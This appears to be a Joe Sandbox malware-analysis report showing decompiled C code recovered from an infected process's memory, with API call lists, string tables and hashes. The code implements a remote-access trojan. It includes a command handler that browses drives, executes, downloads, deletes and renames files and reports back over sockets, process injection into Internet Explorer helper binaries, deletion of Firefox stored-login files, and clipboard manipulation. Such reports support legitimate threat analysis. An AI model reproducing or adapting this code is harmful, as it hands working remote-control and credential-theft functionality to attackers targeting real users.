                				if(_t738 > 0) {
                					_t652 = _t651 - 0x8e;
                					__eflags = _t652;
                					if(_t652 == 0) {
                						__eflags = 0;
                						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, 0, 0)));
                						_t166 = E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1));
                						_t629 =  &_v552;
                						CreateDirectoryW(E00401EE4(E004087F0( &_v480,  &_v552, _t674, _t166)), 0);
                						E00401EE9();
                						E0040322F(0x2a);
                						E004086D0(0, _t680 - 0x18,  &_v552, __eflags,  &_v556);
                						goto L57;
                					} else {
                						_t654 = _t652 - 3;
                						__eflags = _t654;
                						if(__eflags == 0) {
                							_t182 = StrToIntA(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                							_t629 = E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1));
                							E0041B35B(_t182, _t184);
                						} else {
                							_t656 = _t654 - 0x24;
                							__eflags = _t656;
                							if(__eflags == 0) {
                								 *0x470b18 = 0;
                								_t186 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
                								_t683 = _t680 - 0x18;
                								E004020D6(0, _t683, _t629, __eflags, _t186);
                								_t684 = _t683 - 0x18;
                								E0040415E(0, _t684, _t629, _t674, 0x46a8f0);
                								_t190 = E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0));
                								_t685 = _t684 - 0x18;
                								E0040415E(0, _t685, _t629, _t674, _t190);
                								E00401E45( &_v572, _t629, _t674, __eflags, 1);
                								E00407E80(E0041A947(__eflags), _t629, __eflags);
                								_t686 = _t685 + 0x48;
                								__eflags =  *0x470b18; // 0x0
                								if(__eflags == 0) {
                									Sleep(0x7d0);
                									E004020D6(0, _t686 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 0));
                									_push(0xb9);
                									goto L54;
                								}
                							} else {
                								_t657 = _t656 - 3;
                								__eflags = _t657;
                								if(_t657 == 0) {
                									 *0x470b18 = 1;
                								} else {
                									_t658 = _t657 - 0xa;
                									__eflags = _t658;
                									if(__eflags == 0) {
                										_t198 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
                										_t688 = _t680 - 0x18;
                										E004020D6(0, _t688, _t629, __eflags, _t198);
                										_t200 = E00407268(_t674);
                										_t689 = _t688 + 0x18;
                										__eflags = _t200;
                										if(_t200 != 0) {
                											E00435760(0x472ec8,  &_v268, 0, 0x104);
                											_t690 = _t689 + 0xc;
                											 *0x470b20(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)),  &_v268);
                											_t210 = E0043A3AC(_t207, E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1)));
                											__eflags = _t210;
                											if(__eflags == 0) {
                												_t691 = _t690 - 0x18;
                												goto L50;
                											} else {
                												_t213 = _t210 - 1;
                												__eflags = _t213;
                												if(__eflags == 0) {
                													E00402073(0,  &_v516, _t629, _t674,  &_v268);
                													E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
                													E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
                													_t629 =  &_v528;
                													E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
                													_t465 = 0;
                													__eflags = 0;
                													goto L48;
                												} else {
                													__eflags = _t213 - 1;
                													if(__eflags == 0) {
                														E00402073(0,  &_v516, _t629, _t674,  &_v268);
                														E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
                														E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
                														_t629 =  &_v528;
                														E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
                														_t465 = 1;
                														L48:
                														E004080F9(_t465, _t629, 0x472ec8);
                														E00401FB8();
                														DeleteFileA( &_v268);
                													}
                												}
                											}
                										}
                									} else {
                										_t659 = _t658 - 1;
                										__eflags = _t659;
                										if(__eflags == 0) {
                											_t229 = E00401E45( &_v552, _t629, _t674, __eflags, 1);
                											_t699 = _t680 - 0x18;
                											E004020D6(0, _t699, _t629, __eflags, _t229);
                											_t231 = E00407268(_t674);
                											_t700 = _t699 + 0x18;
                											__eflags = _t231;
                											if(__eflags != 0) {
                												 *0x470b1c(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                												_t691 = _t700 - 0x14;
                												L50:
                												E004086D0(0, _t691, _t629, __eflags, 0x472f90);
                												E00406EB0();
                												goto L27;
                											}
                										} else {
                											_t660 = _t659 - 4;
                											__eflags = _t659 - 4;
                											if(__eflags == 0) {
                												_t237 = E0043A3AC(_t235, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 1)));
                												_t240 = SetFileAttributesW(E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, _t660)), _t237);
                												__eflags = _t240;
                												E0041A951(_t680 - 0x18, _t629);
                												_push(0xc7);
                												L54:
                												E00404A81(0x472fc0, _t629, __eflags);
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                				} else {
                					if(_t738 == 0) {
                						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                						E0040415E(0,  &_v528, _t629, _t674, E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1)));
                						E00408682( &_v564,  &_v516, 0, E0040869C( &_v556,  &_v528,  &_v528) + 1);
                						_t254 = E00401EE4(E00408897( &_v504,  &_v528, _t674,  &_v552));
                						_t256 = E0043E1F7(E00401EE4( &_v576), _t254);
                						asm("sbb bl, bl");
                						E00401EE9();
                						_t408 =  ~_t256 + 1;
                						__eflags =  ~_t256 + 1;
                						if( ~_t256 + 1 == 0) {
                							_t629 = E004052FE( &_v468, "Unable to rename file!", _t674, 0x472ec8);
                							E00408832(_t408, _t680 - 0x18, _t258, 0x472ec8, _t674, __eflags, "16");
                							_push(0x59);
                							E00404A81(0x472fc0, _t258, __eflags);
                							E00401FB8();
                						} else {
                							_t629 =  &_v492;
                							E004087F0(_t680 - 0x18,  &_v492, _t674, "*");
                							E00406EB0();
                						}
                						E00401EE9();
                						E00401EE9();
                						goto L58;
                					} else {
                						_t662 = _t651 - 0x61;
                						if(_t662 == 0) {
                							_t267 = E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0));
                							_t691 = _t680 - 0x18;
                							E0040415E(0, _t680 - 0x18, _t629, _t674, _t267);
                							_t269 = E00401E45( &_v560, _t629, _t674, __eflags, 2);
                							_t270 = E00401E45( &_v564, _t629, _t674, __eflags, 1);
                							_t629 = _t269;
                							E00419BA2(_t270, _t269);
                							L27:
                						} else {
                							_t664 = _t662 - 0x26;
                							if(_t664 == 0) {
                								GetLogicalDriveStringsA(0x64,  &_v396);
                								E00402097(0,  &_v540, _t629, _t674, __eflags,  &_v396, 0x64);
                								__eflags = E004061F0( &_v548, 0x464518, 0, 2) + 1;
                								E00401F7D(E004061F0( &_v548, 0x464518, 0, 2) + 1);
                								E004020D6(0, _t680 - 0x18, _t629, E004061F0( &_v548, 0x464518, 0, 2) + 1,  &_v564);
                								_t281 = E00407121(0,  &_v544, _t629);
                								_t629 = E00402F11( &_v496,  &_v568, _t674, 0x472ec8);
                								E00402E81(_t680 - 0x18, _t282, _t281);
                								_push(0x51);
                								E00404A81(0x472fc0, _t282, __eflags);
                								E00401FB8();
                								E00401FB8();
                								goto L25;
                							} else {
                								_t666 = _t664 - 1;
                								if(_t666 == 0) {
                									L004086CB(0, 0x472f90, _t629, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                									E004086D0(0, _t680 - 0x18, _t629, __eflags, 0x472f90);
                									E00406EB0();
                									_t297 = E0041A819( &_v492, E00408682(0x472f90,  &_v528, 0, E0040245C() - 2));
                									_t629 = "Browsing directory: ";
                									E004052DD(0, _t680 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t674, __eflags, _t297);
                									E00402073(0, _t680 - 0x18 + 0x18 - 4, "Browsing directory: ", _t674, "i");
                									E0041A04A(0, 0x472ec8);
                									E00401FB8();
                									goto L59;
                								} else {
                									_t668 = _t666 - 1;
                									if(_t668 == 0) {
                										E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
                										ShellExecuteW(0, L"open", E00401EE4( &_v548), 0, 0, 1);
                										_t307 = E0041A819( &_v476,  &_v548);
                										_t629 = "Executing file: ";
                										E004052DD(0, _t680 - 0x18, "Executing file: ", _t674, __eflags, _t307);
                										E00402073(0, _t680 - 4, "Executing file: ", _t674, "i");
                										E0041A04A(0, 0x472ec8);
                										E00401FB8();
                										goto L58;
                									} else {
                										_t669 = _t668 - 1;
                										if(_t669 == 0) {
                											 *0x470b18 = 0;
                											E004020D6(0, _t680 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 2));
                											E0040415E(0, _t680, _t629, _t674, 0x46a8f0);
                											E0040415E(0, _t680 - 0xffffffffffffffe8, _t629, _t674, E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0)));
                											E00401E45( &_v572, _t629, _t674, __eflags, 1);
                											E004080F9(E0041A947(__eflags), _t629, 0x472ec8);
                										} else {
                											_t670 = _t669 - 1;
                											if(_t670 == 0) {
                												 *0x470b18 = 0;
                												E004020BF(0,  &_v468);
                												E004046D7( &_v396, _t674, 1);
                												E004048A8( &_v400, _t670,  &_v396);
                												_t324 = E00401E45( &_v560, _t629, _t674, __eflags, 3);
                												_t718 = _t680 - 0x18;
                												_t325 = E00401E45( &_v564, _t629, _t674, __eflags, 2);
                												E00402EF0(0, _t718, E00402EF0(0,  &_v536, E00402EF0(0,  &_v512, E00402F11( &_v560, E00401E45( &_v568, _t629, _t674, __eflags, 1), _t674, 0x472ec8), _t674, __eflags, _t325), _t674, __eflags, 0x472ec8), _t674, __eflags, _t324);
                												_push(0x56);
                												E00404A81( &_v416, _t329, __eflags);
                												E00401FB8();
                												E00401FB8();
                												E00401FB8();
                												E0040415E(0,  &_v544, _t329, _t674, E00401F8B(E00401E45( &_v600, _t329, _t674, __eflags, 0)));
                												_t338 = E0041A819( &_v572,  &_v548);
                												_t719 = _t718 - 0x18;
                												_t640 = "Downloading file: ";
                												E004052DD(0, _t719, _t640, _t674, __eflags, _t338);
                												_t720 = _t719 - 0x14;
                												_t672 = "i";
                												E00402073(0, _t720, _t640, _t674, "i");
                												E0041A04A(0, 0x472ec8);
                												E00401FB8();
                												E00401EE9();
                												_t345 = E00401F8B(E00401E45( &_v612, _t640, _t674, __eflags, 0));
                												_t722 = _t720 + 0x30 - 0x18;
                												E0040415E(0, _t722, _t640, _t674, _t345);
                												_t349 = E0043E147(_t347, E00401F8B(E00401E45( &_v620, _t640, _t674, __eflags, 4)), 0, 0xa);
                												_push(_t640);
                												_push(_t349);
                												_t350 = E00406FD7( &_v468, __eflags);
                												_t724 = _t722 + 0x2c;
                												_push(0);
                												__eflags = _t350;
                												if(__eflags == 0) {
                													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
                													_t354 = E0041A819( &_v544,  &_v520);
                													_t629 = "Failed to download file: ";
                													E004052DD(0, _t724 - 0x18, "Failed to download file: ", _t674, __eflags, _t354);
                													E00402073(0, _t724 - 4, "Failed to download file: ", _t674, "E");
                													E0041A04A(0, 0x472ec8);
                													E00401FB8();
                													E00401EE9();
                												} else {
                													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
                													_t365 = E0041A819( &_v544,  &_v520);
                													_t629 = "Downloaded file: ";
                													E004052DD(0, _t724 - 0x18, "Downloaded file: ", _t674, __eflags, _t365);
                													E00402073(0, _t724 - 4, "Downloaded file: ", _t674, "i");
                													E0041A04A(0, 0x472ec8);
                													E00401FB8();
                													E00401EE9();
                													E00402073(0, _t724 - 4 + 0x30 - 0x18, "Downloaded file: ", _t674, 0x464074);
                													_push(0x58);
                													E00404A81( &_v432, "Downloaded file: ", __eflags);
                												}
                												E00404E06(_t629);
                												E00404EC2(0,  &_v416, _t629, _t672);
                												L25:
                												E00401FB8();
                											} else {
                												_t673 = _t670 - 1;
                												_t745 = _t673;
                												if(_t673 == 0) {
                													E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, _t745, _t673)));
                													if((GetFileAttributesW(E00401EE4( &_v548)) & 0x00000010) == 0) {
                														_t379 = DeleteFileW(E00401EE4( &_v548));
                													} else {
                														_t379 = E0041AC0A(E00401EE4( &_v548), _t629);
                													}
                													_t747 = _t379;
                													_t748 = _t379 & 0xffffff00 | _t747 != 0x00000000;
                													if((_t379 & 0xffffff00 | _t747 != 0x00000000) == 0) {
                														_t732 = _t680 - 0x18;
                														E0041A879(0, _t732,  &_v540);
                														_push(0x55);
                														E00404A81(0x472fc0,  &_v540, __eflags);
                														_t383 = E0041A819( &_v544,  &_v568);
                														_t733 = _t732 - 0x18;
                														_t645 = "Unable to delete: ";
                														E004052DD(0, _t733, "Unable to delete: ", _t674, __eflags, _t383);
                														_t734 = _t733 - 0x14;
                														_t614 = _t734;
                														_push("E");
                													} else {
                														_t398 = E0041A819( &_v516,  &_v540);
                														_t736 = _t680 - 0x18;
                														_t645 = "Deleted file: ";
                														E004052DD(0, _t736, "Deleted file: ", _t674, _t748, _t398);
                														_t734 = _t736 - 0x14;
                														_t614 = _t734;
                														_push("i");
                													}
                													E00402073(0, _t614, _t645, _t674);
                													E0041A04A(0, 0x472ec8);
                													_t735 = _t734 + 0x30;
                													E00401FB8();
                													_t388 = E00401E45( &_v576, _t645, _t674, _t748, 1);
                													_t629 = "1";
                													_t617 = _t388;
                													if(E00405AE5("1") != 0) {
                														E004086B8(E0040869C( &_v560, _t617, _t617) + 1);
                														_push(0x2a);
                														_t629 =  &_v572;
                														E00401EF3( &_v572,  &_v572, _t673, E00402F52(0,  &_v548,  &_v572, _t674));
                														E00401EE9();
                														E0040415E(0, _t735 - 0x18,  &_v572, _t674, E00401EE4( &_v576));
                														L57:
                														E00406EB0();
                													}
                													L58:
                													L59:
                													E00401EE9();
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				E00401E6D( &_v552, _t629);
                				E00401FB8();
                				E00401FB8();
                				return 0;
                			}


                APIs
                • SetEvent.KERNEL32(?,?), ref: 0040732D
                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 004073FB
                • DeleteFileW.KERNEL32(00000000), ref: 0040741D
                  • Part of subcall function 0041AC0A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                  • Part of subcall function 0041AC0A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                  • Part of subcall function 0041AC0A: FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0040780B
                • GetLogicalDriveStringsA.KERNEL32 ref: 004078EC
                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00407B38
                • DeleteFileA.KERNEL32(?), ref: 00407CC6
                  • Part of subcall function 00407E80: __EH_prolog.LIBCMT ref: 00407E85
                  • Part of subcall function 00407E80: FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                  • Part of subcall function 00407E80: __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                  • Part of subcall function 00407E80: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                • Sleep.KERNEL32(000007D0), ref: 00407D6C
                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00407DAE
                  • Part of subcall function 0041B35B: SystemParametersInfoW.USER32 ref: 0041B450
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                • API String ID: 1067849700-1507758755
                • Opcode ID: 42350e6d86979fa422e2aa9a3fe69452333fb00018cf03748f27ba608750ea0c
                • Instruction ID: bd0fccd32b98e4baecd5a91fc22e0c60ebb53a858293cf8cc6cedc8d782afcc2
                • Opcode Fuzzy Hash: 42350e6d86979fa422e2aa9a3fe69452333fb00018cf03748f27ba608750ea0c
                • Instruction Fuzzy Hash: 8D42A671A083005BC604FB76C9579AF77A9AF90308F40093FF542771E2EE7D9A49869B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0040E991(void* __eflags, char _a4) {
                				char _v0;
                				void* _v8;
                				char _v24;
                				short _v524;
                				char _v528;
                				char _v540;
                				char _v1060;
                				char _v1088;
                				void* _v1092;
                				char _v1108;
                				void* _v1112;
                				char _v1120;
                				void* _v1124;
                				char _v1132;
                				char _v1136;
                				char _v1164;
                				char _v1172;
                				char _v1176;
                				char _v1184;
                				char _v1188;
                				char _v1192;
                				char _v1196;
                				char _v1197;
                				char _v1200;
                				char _v1201;
                				char _v1208;
                				void* _v1212;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t72;
                				void* _t82;
                				void* _t83;
                				char _t84;
                				intOrPtr* _t111;
                				void* _t117;
                				void* _t121;
                				struct _SECURITY_ATTRIBUTES* _t135;
                				void* _t197;
                				void* _t205;
                				void* _t211;
                				void* _t212;
                
                				_t135 = 0;
                				GetModuleFileNameW(0,  &_v524, 0x104);
                				_t193 = "1";
                				if(E00406E3A("1") != 0) {
                					L14:
                					E00401EF3( &_a4, _t193, _t207, E0041A1E5( &_v1108, __eflags));
                					E00401EE9();
                					_t72 = E00410698( &_v528,  &_v0);
                					__eflags = _t72;
                					if(_t72 == 0) {
                						goto L15;
                					}
                				} else {
                					E00401F66(0,  &_v1196);
                					_t211 = CreateToolhelp32Snapshot(2, 0);
                					_v1088 = 0x22c;
                					_push( &_v1088);
                					Process32FirstW(_t211);
                					while(Process32NextW(_t211,  &_v1092) != 0) {
                						E0040415E(_t135,  &_v1184, _t193, _t211,  &_v1060);
                						_t111 = E004022E5( &_v1188,  &_v1164);
                						_t207 = E004022AA( &_v1192,  &_v1164);
                						E00409291( &_v1164,  *((intOrPtr*)(E004022E5( &_v1196,  &_v1164))),  *_t113,  *_t111);
                						_t212 = _t212 + 0xc;
                						_t193 =  &_v24;
                						_t117 = E0040AF46( &_v24);
                						__eflags = _t117;
                						if(_t117 != 0) {
                							E00401EF3( &_v1208, _v1088, _t207, E0041AB76( &_v1120, _v1088));
                							E00401EE9();
                							_t121 = E00406E3A( &_v540);
                							__eflags = _t121;
                							if(_t121 == 0) {
                								_t193 = 0x46a8f0;
                								__eflags = E00406E3A(0x46a8f0);
                								if(__eflags != 0) {
                									L12:
                									E00401EE9();
                									L13:
                									E00401EE9();
                									goto L14;
                								} else {
                									__eflags = E0041AB40(_v1088);
                									if(__eflags != 0) {
                										goto L12;
                									} else {
                										E0040AEE6( &_v1208);
                										E00401EE9();
                										break;
                									}
                								}
                							} else {
                								E00401EE9();
                								E00401EE9();
                							}
                						} else {
                							E00401EE9();
                							continue;
                						}
                						goto L22;
                					}
                					CloseHandle(_t211);
                					_t193 = 0x46a8f0;
                					if(E00406E3A(0x46a8f0) != 0) {
                						goto L13;
                					} else {
                						E00401EE9();
                						L15:
                						_t205 = CreateMutexA(_t135, 1, E00401F8B(E00406292( &_v1108, 0x473268, _t211, "-I")));
                						E00401FB8();
                						E004020BF(_t135,  &_v1132);
                						E00401EE4(0x473220);
                						E0041ADFE( &_v1132);
                						_t82 = E00401F8B( &_v1132);
                						_t83 = E00401EE4( &_a4);
                						_t197 = _t82;
                						_t84 = E00417456(_t83);
                						_v1197 = _t84;
                						if(_t84 != 0) {
                							L20:
                							E00412B5F(0x473238, E00401F8B(0x473238), "Inj", 1);
                							_t135 = _v1197;
                						} else {
                							E0040415E(_t135,  &_v1172, _t197, _t211, L"C:\\Program Files(x86)\\Internet Explorer\\");
                							E00401F8B( &_v1136);
                							_v1201 = E00417456(E00401EE4(E004087F0( &_v1200,  &_v1176, _t211, L"ieinstal.exe")));
                							E00401EE9();
                							if(_v1201 != _t135) {
                								L19:
                								E00401EE9();
                								goto L20;
                							} else {
                								E00401F8B( &_v1132);
                								_v1197 = E00417456(E00401EE4(E004087F0( &_v1196,  &_v1172, _t211, L"ielowutil.exe")));
                								E00401EE9();
                								if(_v1197 != _t135) {
                									goto L19;
                								} else {
                									CloseHandle(_t205);
                									E00401EE9();
                								}
                							}
                						}
                						E00401FB8();
                					}
                				}
                				L22:
                				E00401EE9();
                				return _t135;
                 			}

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00473298,?,00473280), ref: 0040E9AB
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E9D6
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E9F2
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EA71
                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00473280), ref: 0040EA80
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00473280), ref: 0040EBA4
                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00473280), ref: 0040EC90
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                • String ID: 2G$82G$C:\Program Files(x86)\Internet Explorer\$Inj$h2G$ieinstal.exe$ielowutil.exe
                • API String ID: 193334293-656281143
                • Opcode ID: e4606b85d23d25fe3014d30d1567f5fa0e615b6128fa1654cfe03dd8b69724cf
                • Instruction ID: c6ac6d909184663fdd7a24f9be041a716c06b948c98e485a3872bbbcebe7606d
                • Opcode Fuzzy Hash: e4606b85d23d25fe3014d30d1567f5fa0e615b6128fa1654cfe03dd8b69724cf
                • Instruction Fuzzy Hash: F98141301093419BC754FB62D8919EEB7E4AFA0348F40483FF586631E2EF789949CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E0040B0AA(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v148;
                				struct _WIN32_FIND_DATAA _v468;
                				void* __esi;
                				void* __ebp;
                				void* _t41;
                				signed int _t55;
                				signed int _t57;
                				int _t71;
                				int _t73;
                				void* _t132;
                				void* _t133;
                				void* _t134;
                				void* _t135;
                				void* _t136;
                
                				_t141 = __eflags;
                				_t132 = __edi;
                				_t86 = __ebx;
                				E004020BF(__ebx,  &_v100);
                				E004020BF(__ebx,  &_v76);
                				E004020BF(__ebx,  &_v28);
                				_t41 = E00402073(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                				E00401FC2( &_v28, _t42, _t133, E004052DD(_t86,  &_v52, E0043A9AA(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
                				E00401FB8();
                				E00401FB8();
                				_t128 =  &_v28;
                				_t134 = FindFirstFileA(E00401F8B(E00406292( &_v124,  &_v28, _t135, "*")),  &_v468);
                				E00401FB8();
                				_t142 = _t134 - 0xffffffff;
                				if(_t134 != 0xffffffff) {
                					while(1) {
                						__eflags = FindNextFileA(_t134,  &_v468);
                						if(__eflags == 0) {
                							break;
                						}
                						__eflags = _v468.dwFileAttributes & 0x00000010;
                						if((_v468.dwFileAttributes & 0x00000010) != 0) {
                							_t55 = E0043E5D0( &(_v468.cFileName), ".");
                							__eflags = _t55;
                							if(_t55 != 0) {
                								_t57 = E0043E5D0( &(_v468.cFileName), "..");
                								__eflags = _t57;
                								if(_t57 != 0) {
                									E00401FC2( &_v100, _t59, _t134, E00408832(_t86,  &_v52, E00406292( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
                									E00401FB8();
                									E00401FB8();
                									_t128 = E00406292( &_v52,  &_v28, _t135,  &(_v468.cFileName));
                									E00401FC2( &_v76, _t65, _t134, E00408832(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
                									E00401FB8();
                									E00401FB8();
                									_t71 = DeleteFileA(E00401F8B( &_v100));
                									__eflags = _t71;
                									if(_t71 == 0) {
                										GetLastError();
                									}
                									_t73 = DeleteFileA(E00401F8B( &_v76));
                									__eflags = _t73;
                									if(_t73 == 0) {
                										GetLastError();
                									}
                								}
                							}
                						}
                					}
                					E00402073(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
                					E0040B752(_t86, _t128, _t135, __eflags);
                					FindClose(_t134);
                					goto L11;
                				} else {
                					FindClose(_t134);
                					E00402073(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
                					E0040B752(_t86,  &_v28, _t135, _t142);
                					L11:
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					return 1;
                				}
                 			}

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B129
                • FindClose.KERNEL32(00000000), ref: 0040B143
                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B266
                • FindClose.KERNEL32(00000000), ref: 0040B28C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$CloseFile$FirstNext
                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                • API String ID: 1164774033-3681987949
                • Opcode ID: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                • Instruction ID: 4dbca2b9aa89f5e628085f7deb87cc68ab42e838c00934cc31fa014136c7fd8a
                • Opcode Fuzzy Hash: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                • Instruction Fuzzy Hash: E2512C3191421A5ADB14FBA1EC5AEEEB768AF50304F5001BFF406720E2EF785A458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00415802(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                				void* __ebx;
                				int _t10;
                				void* _t20;
                				void* _t22;
                				void* _t31;
                				struct HWND__* _t38;
                				void* _t57;
                				void* _t61;
                				void* _t64;
                				void* _t66;
                
                				_t55 = __edx;
                				_t10 = OpenClipboard(_t38);
                				_t68 = _t10;
                				if(_t10 != 0) {
                					EmptyClipboard();
                					E00401E45( &_a16, _t55, __ebp, _t68, _t38);
                					_t57 = GlobalAlloc(0x2000, E0040245C() + 2);
                					_t20 = GlobalLock(_t57);
                					E00401E45( &_a12, _t55, __ebp, _t68, _t38);
                					_t22 = E0040245C();
                					E004351E0(_t20, E00401F8B(E00401E45( &_a8, _t55, __ebp, _t68, _t38)), _t22);
                					_t66 = _t64 + 0xc;
                					GlobalUnlock(_t57);
                					SetClipboardData(0xd, _t57);
                					CloseClipboard();
                					if(OpenClipboard(_t38) != 0) {
                						_t61 = GetClipboardData(0xd);
                						_t31 = GlobalLock(_t61);
                						GlobalUnlock(_t61);
                						CloseClipboard();
                						_t50 =  !=  ? _t31 : 0x46a8f0;
                						E0040415E(_t38,  &_a28, _t55, __ebp,  !=  ? _t31 : 0x46a8f0);
                						_t55 =  &_a24;
                						E0041A879(_t38, _t66 - 0x18,  &_a24);
                						_push(0x6b);
                						E00404A81(0x4734e8,  &_a24, _t31);
                						E00401EE9();
                					}
                				}
                				E00401E6D( &_a16, _t55);
                				E00401FB8();
                				E00401FB8();
                				return 0;
                 			}

                APIs
                • OpenClipboard.USER32 ref: 00415803
                • EmptyClipboard.USER32 ref: 00415811
                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415831
                • GlobalLock.KERNEL32 ref: 0041583A
